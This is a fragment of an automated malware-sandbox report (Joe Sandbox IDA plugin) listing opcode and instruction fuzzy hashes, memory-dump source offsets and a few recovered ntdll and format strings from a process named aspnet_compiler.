                                                                                                                                                          • Opcode Fuzzy Hash: 76ab1cbce78410b8a85b1a1572c6a27324f669f9483522fcae67dd16abadedce
                                                                                                                                                          • Instruction Fuzzy Hash: 4B9002E1701540925500B2D8C414B0A450597F0202B95C017E1454560CC52589519235
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 14f926b19b8ba08638aa64eb2352925a8014a0c9e7be48fbaffae506aa86ab57
                                                                                                                                                          • Instruction ID: 78c1741d142e98e137754a7e9935dd91b16a158e904fd91bc33fbb5bf8afdee8
                                                                                                                                                          • Opcode Fuzzy Hash: 14f926b19b8ba08638aa64eb2352925a8014a0c9e7be48fbaffae506aa86ab57
                                                                                                                                                          • Instruction Fuzzy Hash: DE900475711400031105F5DC47145070047D7F53533D5C033F1415550CD731CD715331
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 31d145fc0428802526d964c939241193f5eebcc9ba0abaf045e124f1ff41eea4
                                                                                                                                                          • Instruction ID: 6ee1cc1d5c140da0748a51aeb5e7d851449f069aff3d44839e5202673078eaea
                                                                                                                                                          • Opcode Fuzzy Hash: 31d145fc0428802526d964c939241193f5eebcc9ba0abaf045e124f1ff41eea4
                                                                                                                                                          • Instruction Fuzzy Hash: 91900265721400021145B5D8461450B0445A7E63523D5C016F1816590CC62189655321
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cf8a9fd9c7fc11a1b3faa992c8827296655b83e0f0b4118e0b5a700f6b1f0595
                                                                                                                                                          • Instruction ID: 512f00c33aeb0ddabdc50a727e1efe4c244d712b16c8f51c24af7edd814d7211
                                                                                                                                                          • Opcode Fuzzy Hash: cf8a9fd9c7fc11a1b3faa992c8827296655b83e0f0b4118e0b5a700f6b1f0595
                                                                                                                                                          • Instruction Fuzzy Hash: 6390026170544442E10075D89418A06000597E0206F95D012A1464595DC6358951A231
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fe28af0aed1a6f4a26d6475a69f62d87114342b3d4cc87b6256b6455843abbb8
                                                                                                                                                          • Instruction ID: de8e74c2e04ddd3f5950008dd65b4339f3d045da7864b7e56fbbb80a52a54416
                                                                                                                                                          • Opcode Fuzzy Hash: fe28af0aed1a6f4a26d6475a69f62d87114342b3d4cc87b6256b6455843abbb8
                                                                                                                                                          • Instruction Fuzzy Hash: 3090026971340002E18071D8941860A000597E1203FD5D416A0415558CC91589695321
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0fe0cdb09a16702a4504e0a0fca7bcaa652661764d137b61a1c6a4a30fad17ad
                                                                                                                                                          • Instruction ID: 48a8b4e4b11d00ebbf61f202e77ca879fdf3ad51a8517a58cb8cae3b54a37de9
                                                                                                                                                          • Opcode Fuzzy Hash: 0fe0cdb09a16702a4504e0a0fca7bcaa652661764d137b61a1c6a4a30fad17ad
                                                                                                                                                          • Instruction Fuzzy Hash: 2E90026170140003E14071D894286064005E7F1302F95D012E0814554CD91589565322
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5e1de5e7689f893a738b6cbbc09fd2fa33391f77c4e6c57e4cd9461b3c433410
                                                                                                                                                          • Instruction ID: 0e3dc3211e25da09a9e33b5b5b897879768afc43e669efa12ee27460393d50ef
                                                                                                                                                          • Opcode Fuzzy Hash: 5e1de5e7689f893a738b6cbbc09fd2fa33391f77c4e6c57e4cd9461b3c433410
                                                                                                                                                          • Instruction Fuzzy Hash: D890027174140402E14171D884146060009A7E0242FD5C013A0824554EC6558B56AB61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d1a6e0c08fd02f47368b5e63889d8e98c14bd9ae02e659d603d7719df16206cb
                                                                                                                                                          • Instruction ID: c6e74f75408693a83443a5640805b4b70a3c9d59083a76923a70fb493b178485
                                                                                                                                                          • Opcode Fuzzy Hash: d1a6e0c08fd02f47368b5e63889d8e98c14bd9ae02e659d603d7719df16206cb
                                                                                                                                                          • Instruction Fuzzy Hash: 05900261742441526545B1D884145074006A7F02427D5C013A1814950CC5269956D721
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f2bfd454c1978239c4eb3e526aa44d454e2873a372c47a65c742bc511de2b4f6
                                                                                                                                                          • Instruction ID: 2b29e7dbeec821ca38c5371f1d4758e551966b7598d969f088ba4c66cedf1eab
                                                                                                                                                          • Opcode Fuzzy Hash: f2bfd454c1978239c4eb3e526aa44d454e2873a372c47a65c742bc511de2b4f6
                                                                                                                                                          • Instruction Fuzzy Hash: CD90027170140842E10071D88414B46000597F0302F95C017A0524654DC615C9517621
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d6b3d03714d74bbb2603b7c08a96c1e6cc2a34b81b7b9514aa1180417a1cbef1
                                                                                                                                                          • Instruction ID: 4fab80891cf7cee8785e05f1e969b0ee10453d0f3a32fb5ef625861514077e9c
                                                                                                                                                          • Opcode Fuzzy Hash: d6b3d03714d74bbb2603b7c08a96c1e6cc2a34b81b7b9514aa1180417a1cbef1
                                                                                                                                                          • Instruction Fuzzy Hash: 5190027170140402E10075D89418646000597F0302F95D012A5424555EC66589916231
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7dba9585a5619bc5b39041f4bd56a1c47093194a8cc09754d508d7644a63c46e
                                                                                                                                                          • Instruction ID: ee0f6fd16a793b00d76875c1e27c5cee6a7ac0c1379ba8ec34345beeac0dd49c
                                                                                                                                                          • Opcode Fuzzy Hash: 7dba9585a5619bc5b39041f4bd56a1c47093194a8cc09754d508d7644a63c46e
                                                                                                                                                          • Instruction Fuzzy Hash: 8A900261B0540402E14071D89428706001597E0202F95D012A0424554DC6598B5567A1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9b496fbdda7356a4a7f2f8ab3447a7e22bdd34e23a2697e69fab81088a89c08d
                                                                                                                                                          • Instruction ID: 8d3655679691dd312e2411bee3187a6850ba9929c1f28864e2331227312c4e44
                                                                                                                                                          • Opcode Fuzzy Hash: 9b496fbdda7356a4a7f2f8ab3447a7e22bdd34e23a2697e69fab81088a89c08d
                                                                                                                                                          • Instruction Fuzzy Hash: 0B90027170140403E10071D89518707000597E0202F95D412A0824558DD65689516221
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 06e041381be9afd7577aacf4c6b600702640736183db99707ce7c95f1c3bf01b
                                                                                                                                                          • Instruction ID: 17ed32a63dfae7758baa48e75a9805f0d898c2edec1ce75ccbcb1e1c0b3463fc
                                                                                                                                                          • Opcode Fuzzy Hash: 06e041381be9afd7577aacf4c6b600702640736183db99707ce7c95f1c3bf01b
                                                                                                                                                          • Instruction Fuzzy Hash: D59002A174140442E10071D88424B060005D7F1302F95C016E1464554DC619CD526226
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eb3659e881ee613c0b2db7484d8de902c9914a0e9480be4b34f5d200387e3f03
                                                                                                                                                          • Instruction ID: bee19015de1d69169ee99987c1bf5f9a657ca8d559a4e3e7dfed56fdb6517c76
                                                                                                                                                          • Opcode Fuzzy Hash: eb3659e881ee613c0b2db7484d8de902c9914a0e9480be4b34f5d200387e3f03
                                                                                                                                                          • Instruction Fuzzy Hash: 589002A171140042E10471D88414706004597F1202F95C013A2554554CC5298D615225
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4c1211bfc4c7fbe20d132a0f7d351a84cf7b093f29863b1566cd37e4586d1e08
                                                                                                                                                          • Instruction ID: c94faad65ecfe3e2055ac58c9fa24ec63377dd878e77fd43c5d28f77bf185263
                                                                                                                                                          • Opcode Fuzzy Hash: 4c1211bfc4c7fbe20d132a0f7d351a84cf7b093f29863b1566cd37e4586d1e08
                                                                                                                                                          • Instruction Fuzzy Hash: 2090027170180402E10071D8882470B000597E0303F95C012A1564555DC62589516671
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 06a7333a5202a3d6dd12d6e8874d103a8560867d0c6c50ff9b8a069c0f8e8108
                                                                                                                                                          • Instruction ID: 425d8f2f3efb5e72eb4ba897b1d06d86798af5ea50113f7a5764477e0f2c2ee3
                                                                                                                                                          • Opcode Fuzzy Hash: 06a7333a5202a3d6dd12d6e8874d103a8560867d0c6c50ff9b8a069c0f8e8108
                                                                                                                                                          • Instruction Fuzzy Hash: 2690027170180402E10071D88818747000597E0303F95C012A5564555EC665C9916631
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d2f02ad3538f695e4e5ff5ec1debb982a65f5f40ed279e08d88b9422c815b1f0
                                                                                                                                                          • Instruction ID: 19152a8f698cc55aedba6cd68378965d6f8ee4c77fe3e8e8f6aab157757d762a
                                                                                                                                                          • Opcode Fuzzy Hash: d2f02ad3538f695e4e5ff5ec1debb982a65f5f40ed279e08d88b9422c815b1f0
                                                                                                                                                          • Instruction Fuzzy Hash: 9A900261B0140042514071E8C8549064005BBF1212795C122A0D98550DC55989655765
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9d2076d8478c82b1cf1cdbbe38711be7926f691997fe61df6fffb48ee837ebc1
                                                                                                                                                          • Instruction ID: e7d2c3d4fd9499b54e33143da1faba95c7338b4dcb88d5689eeb8fca280d5a61
                                                                                                                                                          • Opcode Fuzzy Hash: 9d2076d8478c82b1cf1cdbbe38711be7926f691997fe61df6fffb48ee837ebc1
                                                                                                                                                          • Instruction Fuzzy Hash: DC900261711C0042E20075E88C24B07000597E0303F95C116A0554554CC91589615621
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d3e7d4e72ebe36f85f8a4a6bf696b650b03c8b0fe5c5db3ff342f80bfe9c5fa9
                                                                                                                                                          • Instruction ID: 73c423b269d1c00697147d0aef323ddd05c1e81d02eb24854d82842d1d908ca7
                                                                                                                                                          • Opcode Fuzzy Hash: d3e7d4e72ebe36f85f8a4a6bf696b650b03c8b0fe5c5db3ff342f80bfe9c5fa9
                                                                                                                                                          • Instruction Fuzzy Hash: A090026170140402E10271D884246060009D7E1346FD5C013E1824555DC6258A53A232
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e29e614f9dc9977e273e52e7890d60de8f855d4bad901c5a8fed7f94214f1077
                                                                                                                                                          • Instruction ID: b63b48873cc1882c1bdf5b4114845130b681d7dc96796d309bb4860354435f6f
                                                                                                                                                          • Opcode Fuzzy Hash: e29e614f9dc9977e273e52e7890d60de8f855d4bad901c5a8fed7f94214f1077
                                                                                                                                                          • Instruction Fuzzy Hash: 3D900261B0140502E10171D88414616000A97E0242FD5C023A1424555ECA258A92A231
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 53a60f1b347c1bf9be64cc9d36fd2f0028b48cd12588132f6bac8f5b68bf481b
                                                                                                                                                          • Instruction ID: 586c809fc273f0baad0c35c8fedd5bc46e393bbb10ea97a3578e13c2aeffa001
                                                                                                                                                          • Opcode Fuzzy Hash: 53a60f1b347c1bf9be64cc9d36fd2f0028b48cd12588132f6bac8f5b68bf481b
                                                                                                                                                          • Instruction Fuzzy Hash: 039002B170140402E14071D88414746000597E0302F95C012A5464554EC6598ED56765
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 15ec8794942cc79617f763519a6b650a86de3c9ec037544acfe34e5f8a7d441a
                                                                                                                                                          • Instruction ID: bdcf193e38581623a8d035b9086a6e730f379a1784c9e576428538a108f2e5d4
                                                                                                                                                          • Opcode Fuzzy Hash: 15ec8794942cc79617f763519a6b650a86de3c9ec037544acfe34e5f8a7d441a
                                                                                                                                                          • Instruction Fuzzy Hash: 099002A170180403E14075D88814607000597E0303F95C012A2464555ECA298D516235
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 29199dba10597439e7f59b560b368c4024bcd769a3c5d2d211aeac7eccd1b6b3
                                                                                                                                                          • Instruction ID: 9548e20f9cfa45f99113b9b6d56d6f59ce285484ea7bf09a9905e555dafaa07b
                                                                                                                                                          • Opcode Fuzzy Hash: 29199dba10597439e7f59b560b368c4024bcd769a3c5d2d211aeac7eccd1b6b3
                                                                                                                                                          • Instruction Fuzzy Hash: DE90026170184442E14072D88814B0F410597F1203FD5C01AA4556554CC91589555721
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fa0fff586ff3df784a6afed98fe715c1ee8f59d88e434f43f087b765e4bb2d87
                                                                                                                                                          • Instruction ID: b0a39ed1d156cf54a4fb96b05a00f7247414465fed4c0c3f8b1ee8d1a0bff514
                                                                                                                                                          • Opcode Fuzzy Hash: fa0fff586ff3df784a6afed98fe715c1ee8f59d88e434f43f087b765e4bb2d87
                                                                                                                                                          • Instruction Fuzzy Hash: 5A90026174140802E14071D8C4247070006D7E0602F95C012A0424554DC6168A6567B1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 845df2d619964c940ca5d8d4f06a1de984278930a2a4a8c65680c4de356947b3
                                                                                                                                                          • Instruction ID: 391a9b7560423d89df72ea86d54ad3c5bd0bb6b333d9e36b9c8141d5beadb63b
                                                                                                                                                          • Opcode Fuzzy Hash: 845df2d619964c940ca5d8d4f06a1de984278930a2a4a8c65680c4de356947b3
                                                                                                                                                          • Instruction Fuzzy Hash: 5C90026174545102E15071DC84146164005B7F0202F95C022A0C14594DC55589556321
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5de85f17efd96e084ad776c1fe30e72dc8230085dcda0b7eec1741c68b145040
                                                                                                                                                          • Instruction ID: cb017e49465e34a5bef5a92d3f4961a0e9f8fd725901cbc94673c174f7479214
                                                                                                                                                          • Opcode Fuzzy Hash: 5de85f17efd96e084ad776c1fe30e72dc8230085dcda0b7eec1741c68b145040
                                                                                                                                                          • Instruction Fuzzy Hash: 3190027170240142A54072D89814A4E410597F1303BD5D416A0415554CC91489615321
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6db2bd01cab7aff1805c2e22a7dc930dbda4257ea4df5c80c4b794c845a1ad65
                                                                                                                                                          • Instruction ID: 488a9a086f0e917910eacfa554cd4c346730c3269a19357c09bb2e1d1fb4c63f
                                                                                                                                                          • Opcode Fuzzy Hash: 6db2bd01cab7aff1805c2e22a7dc930dbda4257ea4df5c80c4b794c845a1ad65
                                                                                                                                                          • Instruction Fuzzy Hash: 5690027570140402E51071D89814646004697E0302F95D412A0824558DC65489A1A221
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                          • Instruction ID: 22c71f1671e2c3f6791743576cd4541f112c70da0bc8501e277d1c7f4fc19218
                                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                          • Opcode ID: 9df61031a2dbe2a29e02144698b941188544ef76f08834b64c69dae5654a5ced
                                                                                                                                                          • Instruction ID: 291fb1d9475cc92b159f562d1ec9250f1a193899a03a448a4ebf6df632958fa8
                                                                                                                                                          • Opcode Fuzzy Hash: 9df61031a2dbe2a29e02144698b941188544ef76f08834b64c69dae5654a5ced
                                                                                                                                                          • Instruction Fuzzy Hash: 2F51C5A5A0011ABBDF11DB9C889097EFBF8BB18640B54C169F4E5D7641E374DE409BA0
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                          • Opcode ID: 362bce5b5ee7d604535fdd3798237e8aca77e4e952d06220836ad9d3a3f35e29
                                                                                                                                                          • Instruction ID: 5e7df206020d1331fe639a1acae2c67a45e7624ef873d347ec288136ad48ff99
                                                                                                                                                          • Opcode Fuzzy Hash: 362bce5b5ee7d604535fdd3798237e8aca77e4e952d06220836ad9d3a3f35e29
                                                                                                                                                          • Instruction Fuzzy Hash: 8F51F771E00645AFDB3ADE9CC8949BFB7F8EB44200B44846AE5D6D7681D7F5DA008760
                                                                                                                                                          Strings
                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010C46FC
                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010C4725
                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 010C4787
                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010C4742
                                                                                                                                                          • ExecuteOptions, xrefs: 010C46A0
                                                                                                                                                          • Execute=1, xrefs: 010C4713
                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010C4655
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
